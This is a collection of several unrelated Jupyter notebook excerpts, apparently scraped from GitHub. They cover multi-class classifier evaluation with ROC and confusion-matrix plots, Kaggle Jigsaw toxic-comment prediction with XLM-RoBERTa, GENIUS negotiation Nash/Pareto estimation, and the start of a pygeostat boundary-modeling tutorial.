# print(testLabel_bi.shape)
rfResult_bi = label_binarize(rfResult, classes=[0,1,2,3,4,5])
# print(rfResult_bi)
n_classes = 6
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
print(testLabel_bi[:, i])
print(proba[:, i])
fpr[i], tpr[i], _ = roc_curve(testLabel_bi[:, i], proba[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# print(fpr)
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(testLabel_bi.ravel(), proba.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
#######
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
# print(all_fpr)
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(5, 5))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC of Random Forest')
plt.legend(loc="lower right")
plt.savefig('figure/rf_roc.png')
plt.show()
```
# plot_learning_curve function
```
from sklearn.model_selection import learning_curve
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
plt.figure()
plt.title(title)
#ylim定义绘制的最小和最大y值
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid()
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="aquamarine")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="dodgerblue")
plt.plot(train_sizes, train_scores_mean, 'o-', color="aquamarine",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="dodgerblue",
label="Cross-validation score")
plt.legend(loc="best")
plt.savefig('figure/'+title+'.png')
return plt
```
# Learning Curve
```
X = trainSet
y = trainLabel
# print(X.shape)
# print(y.shape)
title = "Learning Curve of Random Forest"
cv = ShuffleSplit(n_splits=20, test_size=0.2, random_state=0)
plot_learning_curve(rf, title, X, y, (0.85, 1.01), cv=cv, n_jobs=4)
# 混淆矩阵
con_mat = confusion_matrix(testLabel, rfResult)
con_mat_norm = con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis] # 归一化
con_mat_norm = np.around(con_mat_norm, decimals=2)
# === plot ===
plt.figure(figsize=(5, 5))
sns.heatmap(con_mat_norm, annot=True, cmap='Blues')
plt.ylim(0, 6)
plt.xlabel('Predicted labels')
plt.ylabel('True labels')
plt.title('Confusion Matrix of Random Forest')
# save the figure
plt.savefig('figure/rf_confusion_matrix.png')
plt.show()
```
# LBGMClassifier
```
lgbm = LGBMClassifier(objective = 'multiclass', boosting_type = 'goss', num_leaves = 10, max_depth= -1, n_estimators =50, learning_rate = 0.3, subsample_for_bin = 800, n_jobs=4)
starttime = datetime.datetime.now()
lgbm.fit(trainSet, trainLabel)
endtime = datetime.datetime.now()
print('training time:', (endtime - starttime))
starttime = datetime.datetime.now()
lgbmResult = lgbm.predict(testSet)
endtime = datetime.datetime.now()
print('predicting time:', (endtime - starttime))
# save the model
joblib.dump(lgbm, 'model/lgbm.model')
from sklearn.metrics import f1_score
print("F-score: {0:.2f}".format(f1_score(lgbmResult,testLabel,average='micro')))
print("the accurancy is :",np.mean(lgbmResult == testLabel))
proba = lgbm.predict_proba(testSet)
testLabel_bi = label_binarize(testLabel, classes=[0 ,1, 2,3,4,5])
lgbmResult_bi = label_binarize(lgbmResult, classes=[0 ,1, 2,3,4,5])
n_classes = 6
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(testLabel_bi[:, i], proba[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(testLabel_bi.ravel(), proba.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
#######
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
print(all_fpr)
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(5, 5))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC of LightGBM')
plt.legend(loc="lower right")
plt.savefig('figure/lgbm_roc.png')
plt.show()
X = trainSet
y = trainLabel
title = "Learning Curve of LGBMClassifier"
cv = ShuffleSplit(n_splits=20, test_size=0.2, random_state=0)
plot_learning_curve(lgbm, title, X, y, (0.6, 1.01), cv=cv, n_jobs=4)
plt.show()
con_mat = confusion_matrix(testLabel, lgbmResult)
con_mat_norm = con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis] # 归一化
con_mat_norm = np.around(con_mat_norm, decimals=2)
# === plot ===
plt.figure(figsize=(5, 5))
sns.heatmap(con_mat_norm, annot=True, cmap='Blues')
plt.ylim(0, 6)
plt.title('Confusion Matrix of LGBM')
plt.xlabel('Predicted labels')
plt.ylabel('True labels')
plt.savefig('figure/lgbm_confusion_matrix.png')
plt.show()
```
# xgbBoost
```
xgb = XGBClassifier(random_state=0,n_estimators=100,scale_pos_weight=10,learning_rate=0.1,max_depth=6,subsample=0.8,min_child_weight=10)
starttime = datetime.datetime.now()
xgb.fit(trainSet, trainLabel)
endtime = datetime.datetime.now()
print('training time:', (endtime - starttime))
starttime = datetime.datetime.now()
xgbResult = xgb.predict(testSet)
endtime = datetime.datetime.now()
print('predicting time:', (endtime - starttime))
# save the model
joblib.dump(xgb, 'model/xgb.model')
from sklearn.metrics import f1_score
print("F-score: {0:.2f}".format(f1_score(xgbResult,testLabel,average='micro')))
print("the accurancy is :",np.mean(xgbResult == testLabel))
proba = xgb.predict_proba(testSet)
testLabel_bi = label_binarize(testLabel, classes=[0 ,1, 2,3,4,5])
n_classes = 6
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
#print(testLabel[:, i])
#print(proba[:, i])
fpr[i], tpr[i], _ = roc_curve(testLabel_bi[:, i], proba[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(testLabel_bi.ravel(), proba.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
#######
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
print(all_fpr)
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(5, 5))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC of XGBoost')
plt.legend(loc="lower right")
plt.savefig('figure/xgb_roc.png')
plt.show()
X = trainSet
y = trainLabel
title = "Learning Curve of xgbBoost"
cv = ShuffleSplit(n_splits=20, test_size=0.2, random_state=0)
plot_learning_curve(xgb, title, X, y, (0.6, 1.01), cv=cv, n_jobs=4)
plt.show()
con_mat = confusion_matrix(testLabel, xgbResult)
con_mat_norm = con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis] # 归一化
con_mat_norm = np.around(con_mat_norm, decimals=2)
# === plot ===
plt.figure(figsize=(5, 5))
sns.heatmap(con_mat_norm, annot=True, cmap='Blues')
plt.ylim(0, 6)
plt.title('Confusion Matrix of XGBoost')
plt.xlabel('Predicted labels')
plt.ylabel('True labels')
plt.savefig('figure/xgb_confusion_matrix.png')
plt.show()
```
# AdaBoost
```
ad=AdaBoostClassifier(DecisionTreeClassifier(),algorithm="SAMME.R", n_estimators=100,learning_rate=0.1,random_state=0)
starttime = datetime.datetime.now()
ad.fit(trainSet, trainLabel)
endtime = datetime.datetime.now()
print('training time:', (endtime - starttime))
starttime = datetime.datetime.now()
adResult = ad.predict(testSet)
endtime = datetime.datetime.now()
print('predicting time:', (endtime - starttime))
# save the model
joblib.dump(ad, 'model/ad.model')
from sklearn.metrics import f1_score
print("F-score: {0:.2f}".format(f1_score(adResult,testLabel,average='micro')))
print("the accurancy is :",np.mean(adResult == testLabel))
proba = ad.predict_proba(testSet)
testLabel_bi = label_binarize(testLabel, classes=[0,1,2,3,4,5])
n_classes = 6
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
#print(testLabel[:, i])
#print(proba[:, i])
fpr[i], tpr[i], _ = roc_curve(testLabel_bi[:, i], proba[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(testLabel_bi.ravel(), proba.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
#######
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
print(all_fpr)
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(5, 5))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC of AdaBoost')
plt.legend(loc="lower right")
plt.savefig('figure/ad_roc.png')
plt.show()
X = trainSet
y = trainLabel
title = "Learning Curve of AdaBoost"
cv = ShuffleSplit(n_splits=20, test_size=0.2, random_state=0)
plot_learning_curve(ad, title, X, y, (0.4, 1.05), cv=cv, n_jobs=4)
plt.show()
con_mat = confusion_matrix(testLabel, adResult)
con_mat_norm = con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis] # 归一化
con_mat_norm = np.around(con_mat_norm, decimals=2)
# === plot ===
plt.figure(figsize=(5, 5))
sns.heatmap(con_mat_norm, annot=True, cmap='Blues')
plt.ylim(0, 6)
plt.title('Confusion Matrix of AdaBoost')
plt.xlabel('Predicted labels')
plt.ylabel('True labels')
plt.savefig('figure/ad_confusion_matrix.png')
plt.show()
```
# GBDT
```
gbdt = GradientBoostingClassifier(random_state=0,n_estimators=100,learning_rate=0.1,subsample=0.8)
starttime = datetime.datetime.now()
gbdt.fit(trainSet, trainLabel)
endtime = datetime.datetime.now()
print('training time:', (endtime - starttime))
starttime = datetime.datetime.now()
gbdtResult = gbdt.predict(testSet)
endtime = datetime.datetime.now()
print('predicting time:', (endtime - starttime))
# save the model
joblib.dump(gbdt,"model/gbdt_model.h5")
from sklearn.metrics import f1_score
print("F-score: {0:.3f}".format(f1_score(gbdtResult,testLabel,average='micro')))
print("the accurancy is :",np.mean(gbdtResult == testLabel))
proba = gbdt.predict_proba(testSet)
testLabel_bi = label_binarize(testLabel, classes=[0 ,1, 2,3,4,5])
lw =2
n_classes = 6
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
#print(testLabel[:, i])
#print(proba[:, i])
fpr[i], tpr[i], _ = roc_curve(testLabel_bi[:, i], proba[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(testLabel_bi.ravel(), proba.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
#######
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
print(all_fpr)
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(5, 5))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC of GBDT')
plt.legend(loc="lower right")
plt.savefig('figure/gbdt_roc.png')
plt.show()
X = trainSet
y = trainLabel
title = "Learning Curve of GBDT"
cv = ShuffleSplit(n_splits=20, test_size=0.2, random_state=0)
plot_learning_curve(gbdt, title, X, y, (0.6, 1.01), cv=cv, n_jobs=4)
plt.show()
con_mat = confusion_matrix(testLabel, gbdtResult)
con_mat_norm = con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis] # 归一化
con_mat_norm = np.around(con_mat_norm, decimals=2)
# === plot ===
plt.figure(figsize=(5, 5))
sns.heatmap(con_mat_norm, annot=True, cmap='Blues')
plt.ylim(0, 6)
plt.title('Confusion Matrix of GBDT')
plt.xlabel('Predicted labels')
plt.ylabel('True labels')
plt.savefig('figure/gbdt_confusion_matrix.png')
plt.show()
```
# SVM
```
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVC
svm = Pipeline(( ("scaler", StandardScaler()),
("linear_svc", LinearSVC(C=1, loss="hinge")) ))
# start time
starttime = datetime.datetime.now()
svm.fit(trainSet, trainLabel)
endtime = datetime.datetime.now()
print('training time:', (endtime - starttime))
starttime = datetime.datetime.now()
svmResult = svm.predict(testSet)
endtime = datetime.datetime.now()
print('predicting time:', (endtime - starttime))
# save the model
joblib.dump(svm,"model/svm_model.h5")
from sklearn.metrics import f1_score
print("F-score: {0:.3f}".format(f1_score(svmResult,testLabel,average='micro')))
print("the accurancy is :",np.mean(svmResult == testLabel))
# proba = svm.predict_proba(testSet)
testLabel_bi = label_binarize(testLabel, classes=[0 ,1, 2,3,4,5])
y_score = svm.fit(trainSet, trainLabel).decision_function(testSet)
lw =2
n_classes = 6
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
#print(testLabel[:, i])
#print(proba[:, i])
fpr[i], tpr[i], _ = roc_curve(testLabel_bi[:, i], y_score[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(testLabel_bi.ravel(), y_score.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
#######
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
print(all_fpr)
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(5, 5))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC of SVM')
plt.legend(loc="lower right")
plt.savefig('figure/svm_roc.png')
plt.show()
X = trainSet
y = trainLabel
title = "Learning Curve of SVM"
cv = ShuffleSplit(n_splits=20, test_size=0.2, random_state=0)
plot_learning_curve(svm, title, X, y, (0.80, 1.01), cv=cv, n_jobs=4)
plt.show()
con_mat = confusion_matrix(testLabel, svmResult)
con_mat_norm = con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis] # 归一化
con_mat_norm = np.around(con_mat_norm, decimals=2)
# === plot ===
plt.figure(figsize=(5, 5))
sns.heatmap(con_mat_norm, annot=True, cmap='Blues')
plt.ylim(0, 6)
plt.title('Confusion Matrix of SVM')
plt.xlabel('Predicted labels')
plt.ylabel('True labels')
# save the figure
plt.savefig('figure/svm_confusion_matrix.png')
plt.show()
```
| github_jupyter |
## Dependencies
```
import glob, json
from jigsaw_utility_scripts import *
from tensorflow.keras import layers
from tensorflow.keras.models import Model
from transformers import TFXLMRobertaModel, XLMRobertaConfig
```
## TPU configuration
```
strategy, tpu = set_up_strategy()
print("REPLICAS: ", strategy.num_replicas_in_sync)
AUTO = tf.data.experimental.AUTOTUNE
```
# Load data
```
database_base_path = '/kaggle/input/jigsaw-dataset-split-toxic-roberta-base-192/'
x_test_path = database_base_path + 'x_test.npy'
x_test = np.load(x_test_path)
print('Test samples %d' % len(x_test[0]))
```
# Model parameters
```
input_base_path = '/kaggle/input/12-jigsaw-train-3fold-xlm-roberta-base/'
with open(input_base_path + 'config.json') as json_file:
config = json.load(json_file)
config
vocab_path = input_base_path + 'vocab.json'
merges_path = input_base_path + 'merges.txt'
model_path_list = glob.glob(input_base_path + '*.h5')
model_path_list.sort()
print('Models to predict:')
print(*model_path_list, sep = "\n")
```
# Model
```
module_config = XLMRobertaConfig.from_pretrained(config['config_path'], output_hidden_states=False)
def model_fn(MAX_LEN):
input_ids = layers.Input(shape=(MAX_LEN,), dtype=tf.int32, name='input_ids')
attention_mask = layers.Input(shape=(MAX_LEN,), dtype=tf.int32, name='attention_mask')
base_model = TFXLMRobertaModel.from_pretrained(config['base_model_path'], config=module_config)
sequence_output = base_model({'input_ids': input_ids, 'attention_mask': attention_mask})
last_state = sequence_output[0]
cls_token = last_state[:, 0, :]
output = layers.Dense(1, activation='sigmoid', name='output')(cls_token)
model = Model(inputs=[input_ids, attention_mask], outputs=output)
return model
```
# Make predictions
```
NUM_TEST_IMAGES = len(x_test[0])
test_preds = np.zeros((NUM_TEST_IMAGES, 1))
for model_path in model_path_list:
tf.tpu.experimental.initialize_tpu_system(tpu)
print(model_path)
with strategy.scope():
model = model_fn(config['MAX_LEN'])
model.load_weights(model_path)
# test_preds += np.round(model.predict(list(x_test))) / len(model_path_list)
test_preds += np.round(model.predict(get_test_dataset(x_test, config['BATCH_SIZE'], AUTO))) / len(model_path_list)
```
# Test set predictions
```
submission = pd.read_csv('/kaggle/input/jigsaw-multilingual-toxic-comment-classification/sample_submission.csv')
submission['toxic'] = test_preds
submission.to_csv('submission.csv', index=False)
submission.head(10)
```
| github_jupyter |
```
## This note is just for COMP6200, not for general users
## load all experiments and generate Comparative Results to each domain and each agent
import warnings
warnings.filterwarnings('ignore')
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import *
%matplotlib inline
from trackgenius.predictutility import PredictUtilitySpace
## load experiments information before evaluation
def exp_summary(Experiments):
## extract titles
header_list = list(Experiments)[1:]
domain_prefer_path = []
## extract domain and preference paths
for i in header_list:
i = i.split(";")
domain_prefer_path.append(i)
## extract log files
Total_log_file_list = []
for j in range(len(header_list)):
log_file_list = []
for i in Experiments[header_list[j]]:
log_file_list.append(i)
Total_log_file_list.append(log_file_list)
Domain_list = [i.split("/")[-2] for i in header_list]
return header_list, domain_prefer_path, Total_log_file_list, Domain_list
## generate experiment evaluation for each Domain
def nash_evaluation(GENIUS_Path,
Log_path,
header_list,
domain_prefer_path,
Total_log_file_list,
Visulisation = True,
print_result = True):
Domain_list = [domain_prefer_path[i][2].split("/")[-2] for i in range(len(header_list))]
Domain_dict_nash_diff = {i:[] for i in Domain_list}
Domain_dict_Pare_acc = {i:[] for i in Domain_list}
## for every Domain
for domain_index in range(len(header_list)):
## basic parameters
DOMAIN_Path = GENIUS_Path + domain_prefer_path[domain_index][2]
Domains = domain_prefer_path[domain_index][0:2]
Log_path = Log_path
Log_file = Total_log_file_list[domain_index]
if print_result == True:
print("Target Domain:", DOMAIN_Path.split("/")[-2])
for nego in range(len(Log_file)):
## initialisation
NegoPredicting = PredictUtilitySpace(DOMAIN_Path,
Domains,
Log_path,
Log_file[nego])
info_summary = NegoPredicting.background()
## the steps of outcome space estimation
## (the first figure is the outcome space with full information)
for Agents in info_summary["Agents"]:
pred_summary, info_Nash_Pareto_Pred = NegoPredicting.predicting(info_summary, Agents,
Visulisation = Visulisation,
print_result = print_result)
Domain_dict_nash_diff[Domain_list[domain_index]].append(info_Nash_Pareto_Pred["Nash_diff"])
Domain_dict_Pare_acc[Domain_list[domain_index]].append(info_Nash_Pareto_Pred["Pareto_acc"])
return Domain_dict_nash_diff, Domain_dict_Pare_acc
class CONFIG:
GENIUS_Path = "/Users/songsifan/Genius/"
Log_path = GENIUS_Path + "log/"
csv_path = "./Experiments.csv"
save_path = "./plots/"
Experiments = pd.read_csv(CONFIG.csv_path)
header_list, domain_prefer_path, Total_log_file_list, Domain_list = exp_summary(Experiments)
Domain_list = ["D4_1", "D4_2", "D5_1", "D5_2", "D6_1", "D6_2", "D8"]
Domain_dict_nash_diff, Domain_dict_Pare_acc = nash_evaluation(GENIUS_Path = CONFIG.GENIUS_Path,
Log_path = CONFIG.Log_path,
header_list = header_list,
domain_prefer_path = domain_prefer_path,
Total_log_file_list = Total_log_file_list,
Visulisation = False,
print_result = False)
## difference between ground-truth and predicted Nash values
fig, axes = plt.subplots(nrows=1, ncols=1)
axes.bar(Domain_list, [np.mean(Domain_dict_nash_diff[i]) for i in Domain_dict_nash_diff.keys()], alpha = 0.5)
axes.set_ylabel('Nash_diff')
axes.set_title('Nash_estimation')
axes.legend(["mean_Nash_diff"])
axes.set_ylim([0, 3])
save_name = "mean_Nash_diff.png"
fig.savefig(CONFIG.save_path + save_name, bbox_inches='tight')
## accuracy of between ground-truth and predicted Pareto frontier bids
fig, axes = plt.subplots(nrows=1, ncols=1)
axes.bar(Domain_list, [np.mean(Domain_dict_Pare_acc[i]) for i in Domain_dict_Pare_acc.keys()], alpha = 0.5)
axes.set_ylabel('Pareto_acc')
axes.set_title('Pareto_Frontier_estimation_acc')
axes.legend(["mean_Pareto_acc"])
axes.set_ylim([0, 1])
save_name = "mean_Pareto_acc.png"
fig.savefig(CONFIG.save_path + save_name, bbox_inches='tight')
data_box = []
for domain in [*Domain_dict_Pare_acc]:
data = np.concatenate((Domain_dict_Pare_acc[domain],
[np.percentile(Domain_dict_Pare_acc[domain], 50)*len(Domain_dict_Pare_acc[domain])],
[np.percentile(Domain_dict_Pare_acc[domain], 75)*len(Domain_dict_Pare_acc[domain])],
[np.percentile(Domain_dict_Pare_acc[domain], 25)*len(Domain_dict_Pare_acc[domain])]))
data_box.append(data)
fig, axes = plt.subplots(nrows=1, ncols=1)
axes.boxplot(data_box, 0)
axes.set_ylim([0, 1.1])
axes.set_ylabel('Pareto_acc')
axes.set_title('Pareto_Frontier_estimation_acc')
save_name = "mean_Pareto_acc_box.png"
fig.savefig(CONFIG.save_path + save_name, bbox_inches='tight')
```
| github_jupyter |
<a href="https://colab.research.google.com/github/CcgAlberta/pygeostat/blob/master/examples/BoundaryModeling.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Boundary Modeling
The following notebook is comprised of 7 primary steps:
1. Initialize required packages, directories and parameters
2. Load and inspect the domain indicator data
3. Calculate and model the boundary indicator variogram
4. Calculate and model the Gaussian variogram that yields the indicator variogram when truncated
5. Model the distance function
6. Simulate boundary realizations, through truncation of simulated distance function deviates
7. Save project setting and clean the output files
## 1. Initialize required packages and parameters
```
import pygeostat as gs
import numpy as np
import os
import pandas as pd
import matplotlib.pyplot as plt
```
### Project settings
Load the previously set Matplotlib and Pygeostat settings.
```
#path to GSLIB executables
exe_dir="../pygeostat/executable/"
gs.Parameters['data.griddef'] = gs.GridDef('''
120 5.0 10.0
110 1205.0 10.0
1 0.5 1.0''')
gs.Parameters['data.catdict'] = {1: 'Inside', 0: 'Outside'}
# Data values
gs.Parameters['data.tmin'] = -998
gs.Parameters['data.null'] = -999
# Color map settings
gs.Parameters['plotting.cmap'] = 'bwr'
gs.Parameters['plotting.cmap_cat'] = 'bwr'
# Number of realizations
nreal = 100
gs.Parameters['data.nreal'] = nreal
# Parallel Processing threads
gs.Parameters['config.nprocess'] = 4
# Pot Style settings
gs.PlotStyle['legend.fontsize'] = 12
gs.PlotStyle['font.size'] = 11
```
### Directories
```
# Create the output directory
outdir = 'Output/'
gs.mkdir(outdir)
```
## 2. Load and Inspect the Boundary Data
Note that content in this section was explained in the introduction notebooks. Only new concepts are generally annotated in detail.
### Load the data and note its attributes
```
dat = gs.ExampleData('reservoir_boundary', cat='Domain Indicator')
dat.info
```
### Data content and summary statistics
```
print(dat.describe())
dat.head()
```
### Map of the indicator
```
gs.location_plot(dat)
```
## 3. Calculate and Model the Indicator Variogram
The indicator variogram is calculated and modeled, since this is required input to calculation of the Gaussian variogram model in the next section (used for distance function $df$ modeling).
### Apply the variogram object for convenience
Variogram calculation, modeling, plotting and checking are readily accomplished with the variogram object, although unprovided parameters are inferred.
```
# get the proportions
proportion = sum(dat['Domain Indicator'])/len(dat)
